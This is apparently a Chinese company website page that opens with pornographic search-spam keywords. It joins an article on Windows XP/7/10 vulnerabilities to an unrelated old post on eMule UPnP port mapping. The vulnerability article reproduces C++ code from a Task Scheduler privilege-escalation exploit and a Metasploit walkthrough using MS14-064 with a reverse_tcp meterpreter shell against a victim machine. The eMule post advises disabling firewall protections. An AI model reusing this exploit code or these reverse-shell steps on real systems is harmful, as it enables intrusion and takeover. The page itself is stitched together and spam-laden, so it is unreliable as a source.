操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    我們電腦的windows系統,默認都會開啟系統更新,經常告訴我們要更新修復系統漏洞,還有我們也會自己安裝一些電腦維護軟件,比如安全衛士或電腦管家,有時系統啟動后經常會彈出窗口提示檢測到存在高危漏洞,那么什么是系統漏洞呢?Windows系統漏洞對電腦會造成什么危害?常見的漏洞有哪些? 攻擊者是如何利用這些漏洞的?

    一、 Windows系統漏洞是什么?

    Windows系統漏洞是指操作系統在開發過程中存在的技術缺陷或程序錯誤,這些缺陷可能導致其他用戶(比如黑客)非法訪問或利用病毒攻擊計算機系統,從而竊取電腦重要資料和信息,甚至破壞操作系統。因此,系統開發商(比如微軟公司)一般每月都會發布最新的補丁程序用以修復新發現的漏洞。

    二、系統漏洞有什么危害

    1、系統漏洞經常被不法者或黑客用于向電腦強制安裝惡意程序、傳播病毒以及植入木馬等;

    2、系統漏洞容易導致電腦重要的數據和信息被竊取,嚴重者會導致操作系統被破壞,電腦數據全部丟失;

    3、在局域網環境中,還會造成病毒的傳播,導致其他電腦癱瘓,危害極大;

    4、被嚴重破壞的操作系統只能通過重裝系統來解決,u盤重裝ghost win7教程圖解。

    三、系統漏洞有哪些類型

    系統漏洞主要分為兩種,一種是高危漏洞,另一種是功能性漏洞

    1、高危漏洞:系統核心和Office 漏洞,這些漏洞允許遠程執行代碼,使得電腦有被入侵的危險

    2、功能性漏洞:軟件版本更新或給系統添加實用功能,用于解決普通的電腦問題,提升電腦性能

    四、Windows XP、Windows 7、Windows 10系統常見漏洞

    1.Windows XP系統常見漏洞

    Windows XP系統常見的漏洞有UPNP服務漏洞、升級程序漏洞、幫助和支持中心漏洞、壓縮文件夾漏洞、服務拒絕漏洞、Windows Media Player漏洞、RDP漏洞、VM漏洞、熱鍵漏洞、賬號快速切換漏洞等。

    (1)UPNP服務漏洞

    漏洞描述:允許攻擊者執行任意指令。

    Windows XP默認啟動的UPNP服務存在嚴重安全漏洞。UPNP(Universal Plug and Play)體系面向無線設備、PC和智能應用,提供普遍的對等網絡連接,在家用信息設備、辦公用網絡設備間提供TCP/IP連接和Web訪問功能,該服務 可用于檢測和集成UPNP硬件。

    UPNP協議存在安全漏洞,使攻擊者可非法獲取任何Windows XP的系統級訪問,進行攻擊,還可通過控制多臺XP機器發起分布式的攻擊。

    防御策略:禁用UPNP服務后下載并安裝對應的補丁程序。

    (2)升級程序漏洞

    漏洞描述:如將Windows XP升級至Windows XP Pro,IE會重新安裝,以前打的補丁程序將被全部清除。

    Windows XP的升級程序不僅會刪除IE的補丁文件,還會導致微軟的升級服務器無法正確識別IE是否存在缺陷,即Windows XP Pro系統存在如下2個潛在威脅。

    ·某些網頁或HTML郵件的腳本可自動調用Windows的程序。

    ·可通過IE漏洞窺視用戶的計算機文件。

    防御策略:如IE瀏覽器未下載升級補丁可至微軟網站下載最新補丁程序。

    (3)幫助和支持中心漏洞

    漏洞描述:刪除用戶系統的文件。

    幫助和支持中心提供集成工具,用戶可獲取針對各種主題的幫助和支持。在Windows XP幫助和支持中心存在漏洞,可使攻擊者跳過特殊網頁(在打開該網頁時調用錯誤的函數,并將存在的文件或文件夾名字作為參數傳送)使上傳文件或文件夾的操 作失敗,隨后該網頁可在網站上公布,以攻擊訪問該網站的用戶或被作為郵件傳播來攻擊。該漏洞除使攻擊者可刪除文件外不會賦予其他權利,攻擊者既無法獲取系 統管理員的權限,也無法讀取或修改文件。

    防御策略:安裝Windows XP的Service Pack 3。

    (4)壓縮文件夾漏洞

    漏洞描述:Windows XP壓縮文件夾可按攻擊者的選擇運行代碼。

    在安裝有"Plus"包的Windows XP系統中,"壓縮文件夾"功能允許將Zip文件作為普通文件夾處理。"壓縮文件夾"功能存在2個漏洞,如下所述。

    ·在解壓縮Zip文件時會有未經檢查的緩沖存在于程序中,以存放被解壓文件,因此很可能導致瀏覽器崩潰或攻擊者的代碼被運行。

    ·解壓縮功能在非用戶指定目錄中放置文件,可使攻擊者在用戶系統的已知位置中放置文件。

    防御策略:不接收不信任的郵件附件,也不下載不信任的文件。

    (5)服務拒絕漏洞

    漏洞描述:服務拒絕。

    Windows XP支持點對點的協議(PPTP)作為遠程訪問服務實現的虛擬專用網技術。由于在其控制用于建立、維護和拆開PPTP連接的代碼段中存在未經檢查的緩存, 導致Windows XP的實現中存在漏洞。通過向一臺存在該漏洞的服務器發送不正確的PPTP控制數據,攻擊者可損壞核心內存并導致系統失效,中斷所有系統中正在運行的進 程。該漏洞可攻擊任何一臺提供PPTP服務的服務器。對于PPTP客戶端的工作站,攻擊者只需激活PPTP會話即可進行攻擊。對任何遭到攻擊的系統,可通 過重啟來恢復正常操作。

    防御策略:關閉PPTP服務。

    (6)Windows Media Player漏洞

    漏洞描述:可能導致用戶信息的泄漏,腳本調用,緩存路徑泄漏。

    Windows Media Player漏洞主要產生2個問題:一是信息泄漏漏洞,它給攻擊者提供了一種可在用戶系統上運行代碼的方法,微軟對其定義的嚴重級別為"嚴重";二是腳本 執行漏洞,當用戶選擇播放一個特殊的媒體文件,接著又瀏覽一個特殊建造的網頁后,攻擊者就可利用該漏洞運行腳本。由于該漏洞有特別的時序要求,因此利用該 漏洞進行攻擊相對就比較困難,它的嚴重級別也就比較低。

    防御策略:將要播放的文件先下載到本地再播放,即可不受利用此漏洞進行的攻擊。

    (7)RDP漏洞

    漏洞描述:信息泄露并拒絕服務。

    Windows操作系統通過RDP(Remote Data Protocol)為客戶端提供遠程終端會話。RDP協議將終端會話的相關硬件信息傳送至遠程客戶端,其漏洞如下所述。

    ·與某些RDP版本的會話加密實現有關的漏洞。所有RDP實現均允許對RDP會話中的數據進行加密,在 Windows 2000和Windows XP版本中,純文本會話數據的校驗在發送前并未經過加密,竊聽并記錄RDP會話的攻擊者,可對該校驗密碼分析攻擊并覆蓋該會話傳輸。

    ·與Windows XP中的RDP實現對某些不正確的數據包處理方法有關的漏洞。當接收這些數據包時,遠程桌面服務將會失效,同時也會導致操作系統失效。攻擊者向一個已受影響的系統發送這類數據包時,并不需經過系統驗證。

    防御策略:Windows XP默認并未啟動它的遠程桌面服務。即使遠程桌面服務啟動,只需在防火墻中屏蔽3389端口,即可避免該攻擊。

    (8)VM漏洞

    漏洞描述:可能造成信息泄露,并執行攻擊者的代碼。

    攻擊者可通過向JDBC類傳送無效的參數使宿主應用程序崩潰,攻擊者需在網站上擁有惡意的Java applet并引誘用戶訪問該站點。惡意用戶可在用戶機器上安裝任意DLL,并執行任意的本機代碼,潛在地破壞或讀取內存數據。

    防御策略:經常進行相關軟件的安全更新。

    (9)熱鍵漏洞

    漏洞描述:設置熱鍵后,由于Windows XP的自注銷功能,可使系統"假注銷",其他用戶即可通過熱鍵調用程序。

    熱鍵功能是系統提供的服務,當用戶離開計算機后,該計算機即處于未保護情況下,此時Windows XP會自動實施"自注銷",雖然無法進入桌面,但由于熱鍵服務還未停止,仍可使用熱鍵啟動應用程序。

    防御策略:

    ①由于該漏洞被利用的前提為熱鍵可用,因此需檢查可能會帶來危害的程序和服務的熱鍵。

    ②啟動屏幕保護程序,并設置密碼。

    ③在離開計算機時鎖定計算機。

    (10)賬號快速切換漏洞

    漏洞描述:Windows XP快速賬號切換功能存在問題,可造成賬號鎖定,使所有非管理員賬號均無法登錄。

    Windows XP系統設計了賬號快速切換功能,使用戶可快速地在不同的賬號間切換,但其設計存在問題,可被用于造成賬號鎖定,使所有非管理員賬號均無法登錄。配合賬號 鎖定功能,用戶可利用賬號快速切換功能,快速重試登錄另一個用戶名,系統則會判別為暴力破解,從而導致非管理員賬號鎖定。

    2.Windows 7系統常見漏洞

    與Windows XP相比,Windows 7系統中的漏洞就少了很多。Windows 7系統中常見的漏洞有快捷方式漏洞與SMB協議漏洞2種。

    (1)快捷方式漏洞

    漏洞描述:快捷方式漏洞是Windows Shell框架中存在的一個危急安全漏洞。在Shell32.dll的解析過程中,會通過"快捷方式"的文件格式去逐個解析:首先找到快捷方式所指向的文 件路徑,接著找到快捷方式依賴的圖標資源。這樣,Windows桌面和開始菜單上就可以看到各種漂亮的圖標,我們點擊這些快捷方式時,就會執行相應的應用 程序。

    微軟Lnk漏洞就是利用了系統解析的機制,攻擊者惡意構造一個特殊的Lnk(快捷方式)文件,精心構造一串程序 代碼來騙過操作系統。當Shell32.dll解析到這串編碼的時候,會認為這個"快捷方式"依賴一個系統控件(dll文件),于是將這個"系統控件"加 載到內存中執行。如果這個"系統控件"是病毒,那么Windows在解析這個lnk(快捷方式)文件時,就把病毒激活了。該病毒很可能通過USB存儲器進 行傳播。

    防御策略:禁用USB存儲器的自動運行功能,并且手動檢查USB存儲器的根文件夾。

    (2)SMB協議漏洞

    SMB協議主要是作為Microsoft網絡的通信協議,用于在計算機間共享文件、打印機、串口等。當用戶執行 SMB2協議時系統將會受到網絡攻擊從而導致系統崩潰或重啟。因此,只要故意發送一個錯誤的網絡協議請求,Windows 7系統就會出現頁面錯誤,從而導致藍屏或死機。

    防御策略:關閉SMB服務。

    3、Windows 10常見漏洞

    本地提權漏洞:

    漏洞背景

    win10中任務調度服務導出的函數沒有驗證調用者的權限,任意權限的用戶調用該函數可以獲取系統敏感文件的寫權限,進而提權。

    漏洞影響

    漏洞影響win10和windows server 2016。目前發布的EXP暫時只能用于x64系統。

    漏洞詳情

    win10系統Task Scheduler任務調度服務中ALPC調用接口導出了SchRpcSetSecurity函數,該函數能夠對一個任務或者文件夾設置安全描述符。

    HRESULT SchRpcSetSecurity( [in, string] const wchar_t* path, [in,string] const wchar_t* sddl, [in] DWORD flags );

    該服務是通過svchost的服務組netsvcs所啟動的,對應的dll是schedsvc.dll。

    在xp系統中,任務存放在C:\Windows\Tasks目錄,后綴為.job;而win7及以后的版本任務以xml的格式存放在C:\Windows\System32\Tasks目錄。

    可能是為了兼容的考慮,SchRpcSetSecurity函數在win10中仍然會檢測C:\Windows\Tasks目錄下是否存在后綴為.job的文件,如果存在則會寫入DACL數據。如果將job文件硬鏈接到特定的dll那么特定的dll就會被寫入DACL數據,本來普通用戶對特定的dll只具有讀權限,這樣就具有了寫權限,接下來向dll寫入漏洞利用代碼并啟動相應的程序就獲得了提權。

    那么首先需要找到一個普通用戶具有讀權限而系統具有寫入DACL權限的dll,EXP中用的是C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll,然后將C:\Windows\Tasks\UpdateTask.job硬鏈接到這個dll。

    WIN32_FIND_DATA FindFileData; HANDLE hFind; hFind = FindFirstFile(L"C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64*", &FindFileData); wchar_t BeginPath[MAX_PATH] = L"c:\windows\system32\DriverStore\FileRepository\"; wchar_tPrinterDriverFolder[MAX_PATH]; wchar_t EndPath[23] = L"\Amd64\PrintConfig.dll"; wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); FindClose(hFind); wcscat(BeginPath, PrinterDriverFolder); wcscat(BeginPath, EndPath); //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of CreateNativeHardlink(L"c:\windows\tasks\UpdateTask.job", BeginPath);

    在調用SchRpcSetSecurity函數使普通用戶成功獲取了對該dll寫入的權限之后寫入資源文件中的exploit.dll。

    //Must be name of final DLL.. might be better ways to grab the handle HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE"); //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize = ::SizeofResource(mod, myResource); HGLOBAL myResourceData = ::LoadResource(mod, myResource); void* pMyBinaryData = ::LockResource(myResourceData); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten = 0; do { hFile = CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL); if (hFile == INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile == INVALID_HANDLE_VALUE); CloseHandle(hFile);

    printconfig.dll和系統打印相關,并且沒有被print spooler服務默認啟動。所以隨后調用StartXpsPrintJob開始一個XPS打印。

    //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); IXpsOMObjectFactory *xpsFactory = NULL; CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast

    (&xpsFactory));

    HANDLE completionEvent = CreateEvent(

    NULL, TRUE, FALSE,

    NULL);

    IXpsPrintJob *job =

    NULL;

    IXpsPrintJobStream *jobStream =

    NULL;

    StartXpsPrintJob(

    L"Microsoft XPS Document Writer",

    L"Print Job 1",

    NULL,

    NULL, completionEvent,

    NULL,

    0, &job, &jobStream,

    NULL);

    jobStream->Close();

    CoUninitialize();

    return

    0;

    整個漏洞利用程序編譯出來是個dll,把它注入到notepad中運行,發現spoolsv.exe創建的notepad已經具有SYSTEM權限,而系統中的printconfig.dll也被修改成了資源文件中的exploit.dll。

    防御措施

    建議用戶安裝360安全衛士等終端防御軟件攔截利用此類漏洞的攻擊,不要打開來源不明的程序。

    四、以實例講解攻擊者是如何利用系統漏洞發起攻擊的

    利用MS14-064 漏洞測試入侵win7

    Microsoft Windows OLE遠程代碼執行漏洞,OLE(對象鏈接與嵌入)是一種允許應用程序共享數據和功能的技術,

    遠程攻擊者利用此漏洞通過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本...

    里已經加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_execution

    執行命令:

    msfconsole //啟動MSF

    search ms14 //搜索關鍵字

    use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊

    set payload windows/meterpreter/reverse_tcp //設置反彈連接shell

    如圖:

    需要注意的是箭頭標記的屬性默認為false 需要設置為true ,因為msf中自帶的漏洞利用exp調用的是 powershell,

    所以msf(Metasploit Framework)中的exp代碼只對安裝powershell的系統生效。安裝自帶powershell,

    所以我們這里測試受害的機器為windows7 32位.

    按照圖中各個屬性配置好后 執行exploit即可

    得到一個URL地址,復制到受害者機器(win7)測試

    當用戶點擊允許了后

    可以看見這邊反彈了一個shell,接下里我們就可以隨便搞了,

    攻擊成功,結束!!!

    五、漏洞攻擊如何防護

    1、及時修復系統環境中存在的安全漏洞

    防范漏洞攻擊最直接有效的方法就是修復系統環境中存在的安全漏洞。

    2、 保持騰訊電腦管家、360安全衛士等安全軟件的正常開啟

    正常開啟騰訊電腦管家或者360安全衛士等安全軟件,可以有效攔截利用漏洞觸發傳播的病毒,有效彌補漏洞修復的不足。

    3、 培養良好的計算機使用習慣

    a) 提高計算機網絡安全意識

    b) 不要輕易下載不明軟件程序

    c) 不要輕易打開不明郵件夾帶的可疑附件

    d) 及時備份重要的數據文件

    這是一篇老文章,最早發布于2010-01-05網易博客

    網易博客目前已倒閉,只能作者自己能查看,360圖書館等其它地方都是復制粘貼的。


    適用于內網用戶,即通過路由共享上網的用戶(默認IP一般為192.168.1.x或192.168.0.x)。

    最常見的就是emule ,如果UPnP端口映射失敗,就只能得到lowid ,KAD端口被防火墻阻隔,嚴重影響下載速度。

    一、設DMZ主機,跳過端口映射,變內網為外網

    需路由支持,整個局域網中只能設一臺DMZ主機。

    在開啟DMZ之后,只需在防火墻中打開emule需要的端口或直接禁用防火墻即可。

    二、端口映射

    1、路由端設置

    需開啟路由UPnP。

    2、本機服務設置

    這兩項服務必須開啟,手動、自動皆可。

    3、防火墻設置

    如果是使用的系統自帶防火墻,最好把UPnP框架勾上,其實不勾也無所謂,但為了提高成功率還是建議勾上。

    如果使用的是第三方防火墻,需在防火墻中打開相應的端口,或者暫時禁用防火墻。

    以ESS為例,首先防火墻的過濾模式必須選擇交互模式,然后當ESS防火墻提示emule出站、入站通訊時,選擇創建規則、允許。

    4、手動端口映射

    在以上3點的基礎上,如果通過emule選項中的啟用UPnP端口映射無法成功映射端口,就需要手動來添加相應的端口映射規則。以下介紹兩種方法:

    ①通過脫兔自帶的UPnP工具

    該工具可用于查看已建立的端口映射規則和建立新的端口映射規則。

    IP地址:你的內網IP地址,或直接填寫127.0.0.1

    描述:可任意填寫

    協議:選擇TCP或UDP

    監聽端口、外部端口:選擇你的emule對應的TCP或UDP端口號。

    ②用系統自帶工具

    Ⅰ、關閉殺軟或防火墻的局域網嚴格保護——開啟會導致下一步看不到 Internet 連接

    ESS和KIS都有這個功能(ESET和卡巴的互聯網安全套裝)

    Ⅱ、打開網絡連接

    選中后可點擊編輯查看,如果沒有你需要的端口映射規則,則需新建

    填寫方法與脫兔的自帶的UPnP工具類似。

    Ⅲ、如果第一步中的局域網嚴格保護已關閉,但在第二步中仍然看不到 Internet 連接,只有本地連接,那說明該網絡服務沒有安裝,可按以下圖示操作

    也可直接從控制面板-添加刪除程序-添加刪除Windows組件進入。

    三、其它說明

    1、不啟用協議加密比啟用協議加密共容易獲得高ID

    2、官版emule比其它mod更容易獲得高ID

    3、有時安裝多種mod相互間會沖突——啟用一種mod后,另一種mod無法打開;新安裝一個mod后原本可以獲得高ID的另一個mod無法獲得高ID

    鑒于以上三點,如果以上設置UPnP的方法都無效時,可嘗試關閉協議加密、用官版、刪除多余mod(直接刪除文件夾,刪除前可先備份)

    4、服務器列表與kad節點文件

    這一點大多數人應該都知道,但還是提一下,無法獲得高ID也可能是由于服務器列表文件導致,如服務器列表中服務器為空或過少,有間諜服務器等,可去相應網站更新這兩個文件。

    更新地址 服務器 http://www.server-met.de/ KAD節點 http://www.nodes-dat.com/

    mod意思就是修改版,指除官版外所有emule版本


    補充

    因為是9年前的文章,所以在這里補充幾句:

    1、以前的路由器都有upnp選項,現在很多路由器沒這個選項,默認關閉了這個功能(這樣更安全些)。

    2、9年前那時候免費殺軟還沒普及,許多殺軟會阻隔防火墻,但現在國內大部分家庭用360、騰訊、金山等免費殺軟,默認都不會阻隔。

    3、DMZ主機要先綁定本機IP。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有